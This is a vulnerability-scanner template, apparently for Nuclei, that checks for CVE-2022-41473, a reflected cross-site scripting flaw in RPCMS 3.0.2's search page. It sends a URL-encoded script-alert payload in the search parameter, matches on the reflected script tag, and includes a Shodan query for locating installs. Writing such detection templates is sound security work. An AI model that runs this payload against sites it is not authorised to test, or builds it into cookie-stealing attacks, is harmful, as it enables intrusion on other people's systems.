49 lines
1.3 KiB
YAML
49 lines
1.3 KiB
YAML
id: CVE-2022-41473
|
|
|
|
info:
|
|
name: RPCMS 3.0.2 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://github.com/ralap-z/rpcms/issues/1
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-41473
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-41473
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00085
|
|
cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.html:"RPCMS"
|
|
verified: true
|
|
vendor: 'rpcms'
|
|
product: 'rpcms'
|
|
tags: cve,cve2022,rpcms,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script>'
|
|
- 'rpcms'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|